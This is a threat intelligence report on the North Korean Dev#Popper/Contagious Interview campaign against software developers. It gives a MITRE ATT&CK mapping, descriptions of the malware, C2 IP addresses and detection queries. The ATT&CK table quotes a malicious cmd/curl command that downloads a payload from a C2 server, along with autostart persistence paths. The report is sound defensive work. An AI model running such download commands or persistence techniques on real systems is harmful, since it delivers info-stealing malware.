Dev Popper Contagious Campaign Follow up

3 Nov, 2024

Dev#Popper/Contagious interview campaign follow up – November 2024

APT, North Korea Hunting, Infrastructure Analysis, OSINT

Reading Time: 7 minutes

Executive Summary

Since November 2023, multiple security editors and researchers have consecutively documented an ongoing social engineering campaign targeting software developers based in Europe, North America and Asia through fake interviews to deliver multiple malware families including BeaverTail, InvisibleFerret and CivetQ.
This ongoing campaign has been attributed to North-Korean state-sponsored groups Lazarus (by Group-IB) and to a new group named Tenacious Pungsan (by Datadog).
Threat actors attributed to this campaign are suspected to operate for espionage and financial theft purposes.
Based on our analysis (specifically on the C2 infrastructure), this campaign is still active as of October 2024 and is targeting French developers since at least June 2024. We also assess with moderate confidence that this ongoing effort suggest an interest into conducting additional supply chain attacks by leveraging software developers’ work.
This report provides defenders with:

Key Points

This report can be useful for CTI, SOC and CSIRT analysts.
Overview of the TTPs:
- North Korean actors impersonate recruiters to target tech job seekers, delivering malware under the guise of job interview preparations.
- Attackers use social engineering by posing as job interviewers and tricking software developers into downloading malicious ZIP files or NPM packages. New phishing tactic using fake video conferencing applications (FCCCall) was introduced in September 2024.
- Attackers impersonate recruiters on platforms like LinkedIn, Upwork, and other developer forums to reach potential victims.
- The campaign has evolved to target multiple operating systems, including Windows, Linux, and macOS.
- Scripts are obfuscated, encoded with base64, and using XOR for defense evasion purposes.
- The campaign relies so far on three main payloads:
  - BeaverTail: a JavaScript downloader that can also act as an information stealer to retrieve the second-stage payload InvisibleFerret.
  - InvisibleFerret: a Python-based backdoor which is capable of keylogging, remote control and persistent access via the download of AnyDesk.
  - CivetQ: a set of Python scripts that acts as a downloader of BeaverTail.
- The malware used in this campaign have been designed to steal cryptocurrency, credentials and cookies from multiple web-browsers. The targeted list of browser extensions has been regularly expanded to include multiple items, with a focus on cryptocurrency wallets and authenticator extensions.
- The stolen information is then exfiltrated to a remote command-and-control (C2) server over FTP or Telegram alongside with traditional HTTP.
- The threat actor uses Anydesk for persistence and probably as a mean to blend into regular network traffic.

Assessment

This campaign which has been running since almost two years now indicates a strong effort and a clear interest from North-Korean actors into targeting the software industry. This campaign could just be a way for North Korean actors to conduct additional supply chain attacks such as the 3CX breach reported and investigated by Mandiant back in 2023. Indeed, targeting software developers might grant the attackers access to specific software project the victims are involved in. From there, the attackers could conduct additional malicious operations. Therefore, this campaign might not only be focusing on financial gain but also on espionage.

Although some reports state that this campaign demonstrates advanced sophistication, several elements suggest that is not as sophisticated as we could expect from an APT:

Dependencies issues faced while running a Python script (as highlighted by Secureworks);
Use of unencrypted protocol (FTP) for data exfiltration;
The ease with which it is possible to track the infrastructure.

Key Intelligence Gaps

We did not analyzed the payloads involved in this campaign and we did not conduct additional research on GitHub to find latest projects used by the threat actor. This could likely provide additional pivot points (maybe a second part for this article?).

Campaign properties

Name	Dev#Popper/Contagious interview Campaign follow up
Description	Since December 2022, a campaign attributed to a likely North-Korean threat actor is targeting software developers via social engineering using fake job interviews to deliver malware named BeaverTail, InvisibleFerret and CivetQ. The campaign has been regularly updated since December 2022. Major updates include support for multiple operating systems (macOS, Windows and Linux), reaching more people through additional job search platform and additional obfuscation techniques to evade detection. Based on the malwares’ behaviors, the threat actor aimed at stealing financial and sensitive data and support intelligence effort.
Aliases	Dev#Popper (Securonix) Contagious Interview (Palo Alto)
First Seen	December 2022
Last Seen	October 2024 (ongoing)
Objective	Espionage and financial gain

Victimology

Countries
- United States of America (Since December 2022)
- South Korea (Since July 2024)
- Europe (Since July 2024)
  - France (since June 2024)
- Middle East (Since July 2024)
Sectors
- Technology (Since December 2022)
  - Software industry (Since December 2022)
- Finance (Cryptocurrency and Blockchain professionals) (Since December 2022)

Tactics, Techniques and Procedures

MITRE ATT&CK Table

Tactic	Technique	Technique ID	Procedure	Observation Date
Reconnaissance	Search Open Websites/Domains: – Social Media	T1593 T1593.001	“Like other threat actors, this threat actor could also reach potential victims through email, social media platforms, or chat channels on community forums used by software developers.”	Since December 2022
Reconnaissance	Search Open Websites/Domains: – Social Media	T1593 T1593.001	In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork and others.	Since September 2024
Resource Development	Stage Capabilities – Upload Malware	T1608 T1608.001	“The threat actor might upload an entire malicious NPM package to GitHub” Usage of BitBucket has been identified in October 2024.	Since December 2022 Since October 2024
Initial Access	Supply Chain Compromise: – Compromise Software Supply Chain	T1195 T1195.002	“or they might also inject BeaverTail code into other developer’s legitimate NPM projects. “	Since December 2022
Initial Access	Phishing – Spearphishing via Service – Spearphishing Link	T1566 T1566.002 T1566.003	“Threat actors pose as employers (often anonymously or with vague identities) to lure software developers into installing malware through the interview process.” ”Like other threat actors, this threat actor could also reach potential victims through email, social media platforms, or chat channels on community forums used by software developers.” ”Aside from Linkedin, they also reached out to victims using other job search platforms, and attempted to continue the conversation via Telegram.”	Since December 2022 Since June 2024
Initial Access	Phishing	T1566	BeaverTail arrives in the form of a Windows Installer file, which will install a fake video conferencing application named FCCCall.	Since September 2024
Execution	Command and Scripting Interpreter: – Python – JavaScript	T1059 T1059.006 T1059.007	“Distributed as JavaScript inside NPM packages” ”InvisibleFerret is a simple but powerful Python-based backdoor.”	Since December 2022
Execution	Command and Scripting Interpreter: – PowerShell – Windows Command Shell	T1059.001 T1059.003	“The attackers downloaded and executed the script through PowerShell, however they had a difficult time getting the script’s dependencies to work properly.” “cmd.exe /d /s /c “curl -lo “C:Users[REDACTED]AppDataLocalTempp.zi” “hxxp://147.124.214[.]131:1244/pdown”	Since April 2024
Execution	User Execution – Malicious File	T1204 T1024.002	“BeaverTail also requires human interaction to execute due to its dependency on the Node.js environment.”	Since December 2022
Persistence	Boot or Logon Autostart Execution: – Registry Run Keys / Startup Folder – XDG Autostart Entries	T1547 T1547.001 T1547.013	“%APPDATA%MicrosoftWindowsStart MenuProgramsStartupqueue.bat” ”[homepath]/.config/autostart/queue.desktop”	Since September 2024
Persistence	Create or Modify System Process: – Launch Agent	T1543 T1543.001	“[homepath]/Library/LaunchAgents/com.avatar.update.wake.plist”	Since September 2024
Defense Evasion	Obfuscated Files or Information	T1027	“BeaverTail code obfuscated within GitHub repositories to evade detection” ”The remainder of the temp string is converted from Base64. The result is processed through an XOR loop using the eight character key.”	Since December 2022
Defense Evasion	Masquerading	T1036	“BeaverTail via files masquerading as the following applications: MiroTalk, a real-time video call application FreeConference, a service that offers free conference calling”	Since October 2024
Defense Evasion	Indicator Removal: – File Deletion	T1070 T1070.004	Securonix reported file deletion technique as being used.	Since April 2024
Credential Access	Credentials from Password Stores: – Credentials from Web Browsers	T1555 T1555.003	“This threat also searches the victim’s web browser for extensions associated with cryptocurrency wallets, like Binance and Coinbase.“	Since December 2022
Credential Access	Credentials from Password Stores: – Keychain – Password Managers	T1555 T1555.001 T1555.003	“The list of targeted browser extensions has expanded significantly to a total of 74 applications. Notably, it now includes the addition of the Authenticator, password managers and note-taking extensions.” “logkc_db Keychain files”	Since September 2024
Credential Access	Input Capture: – Keylogging	T1056 T1056.001	“Cross-platform malware written in Python, InvisibleFerret consists of various components with the following functions: Fingerprinting Remote control Keylogging”	Since December 2022
Discovery	System Information Discovery	T1082	“The first component for InvisibleFerret collects system data to create a fingerprint, then sends this data to a C2 server. The first component collects: Internal IP address IP geolocation information System information including OS version, release, host and user information”	Since December 2022
Discovery	System Owner/User Discovery	T1033	“The first decoded code string executes and gathers system and network information from an infected computer and then sends this data to a remote server which includes the following:: Username of the logged-in user A unique identifier for the device (uuid) generated by hashing the MAC address and username”	Since April 2024
Collection	Archive Collected Data	T1560	“Other functions exist to help automate this process by collecting data from various user directories like Documents and Downloads.”	Since April 2024
Collection	Clipboard Data	T1115	“Keylogger and clipboard stealer component and writes to [homepath]/.pygl/.[uuid]”	Since September 2024
Command and Control	Data Encoding	T1132	“InvisibleFerret establishes a connection with the C2 server over TCP traffic and periodically checks in and waits for further instructions. This traffic consists of JSON messages.”	Since December 2022
Command and Control	Ingress Tool Transfer	T1105	Based on Palo Alto analysis, the malware used allows the threat actor to retrieve additional files.	Since December 2022
Command and Control	Application Layer Protocol: – Web Protocols	T1071 T1071.001	“HTTP POST request sends data collected by BeaverTail “	Since December 2022
Command and Control	Non-Standard Port	T1571	“Use of port 1224 and port 1245 for C2 communication reported by Palo Alto”	Since December 2022
Command and Control	Non-Standard Port	T1571	Use of port 1244 reported by Securonix.	Since April 2024
Command and Control	Non-Standard Port	T1571	This downloader communicates with the C2 at port 54321 and retrieves the Python executable and BeaverTail (Python) from it.	Since September 2024
Exfiltration	Exfiltration Over C2 Channel	T1041	Traffic generated over C2 server address.	Since December 2022
Exfiltration	Exfiltration Over Alternative Protocol	T1048	“Contents are uploaded to an actor-controlled FTP server, provided in the JSON response using the following args”	Since December 2022
Command and Control	Remote Access Software	T1219	Cross-platform malware written in Python, InvisibleFerret consists of various components with the following functions: Downloading the AnyDesk client if required for additional control”	Since December 2022
Exfiltration	Automated Exfiltration	T1020	“Data exfiltration processes are automated, triggered by malware command modules”	Since December 2022
Exfiltration	Exfiltration Over Web Service	T1567	Along with uploading the data to the FTP server, they have now included Telegram as an additional method for data exfiltration.	Since September 2024
Impact	Financial Theft	T1657	“The first campaign’s objective is likely cryptocurrency theft”	Since December 2022

CVE exploited

No CVE exploited as part of this campaign.

Malware used

Malware Name	Malware Type	Description	Observation Date
BeaverTail	Downloader	JavaScript-based downloader hidden in a Node Package Manager package.	Since December 2022
InvisibleFerret	Backdoor	Python-based backdoor.	Since December 2022
CivetQ	Information Stealer	Python-based information stealer.	Since September 2024

Tool used

Tactic	Tool	Description	Observation Date
Persistence	AnyDesk	RMM tool.	Since December 2022

Infrastructure analysis

BeaverTail and InvisibleFerret

HTTP requests to port 1224 and/or 1244 on several endpoints (list not exhaustive):
- /keys
- /uploads
- /node
- /pdown
- /client
Usage of “Node.js upload multiple files” banner or “Node.js upload & resize multiple files”
Download of a zip file named “pdown”
Usage of port 8000 to retrieve a run.py file

Latest C2 Infrastructure

Using the prior information on tools such as URLscan, Shodan, Censys, ZoomEye and VirusTotal we were able (as already pointed out by several security researchers, please find the source section below) to collect many additional IPv4 highly likely associated to this ongoing campaign:

# Pdown on port 1224
45.137.213.30
23.106.253.242
23.106.253.221
172.86.98.240
185.235.241.208
# Pdown lookup or pdown on port 1244
147.124.212.146
147.124.214.131
147.124.214.237
23.106.253.215
23.106.253.221
# Pdown on port 1244
23.106.70.154
147.124.214.129
23.106.253.194
67.203.7.163
67.203.7.171
#/keys on port 1224
185.235.241.208
185.235.241.208
# "Node.js upload multiple files" (Shodan and Censys)
143.198.48.95
147.124.197.138
# "Node.js upload & resize multiple files" (Shodan and Censys)
69.43.130.141
69.43.130.153

IoCs can be retrieved from GitHub: https://github.com/threatchronicles/research/blob/main/ioc/dev_popper_contagious_interview_ioc.txt

Signatures

Infrastructure tracking

Queries examples:

# urlscan
filename:"pdown" AND (page.url.keyword:*\:1224* OR page.url.keyword:*\:1244*)

# Censys
(services.http.response.html_title="Node.js upload & resize multiple files") or (services.http.response.html_title="Node.js upload multiple files") and  (services.port:1224 OR services.port:1244)

SIGMA rules

We created a Sigma rule to detect malicious node.js process reported by Securonix. This is available on GitHub:

https://github.com/threatchronicles/research/blob/main/signatures/sigma/windows/win_malicious_nodejs_proc_download_malware.yml

Additionally, the use of AnyDesk can also be detected via existing SIGMA rules:

https://lolrmm.io/tools/anydesk#detections

Sources

Security Editors

Researchers and social media reports

Threat Research Chronicles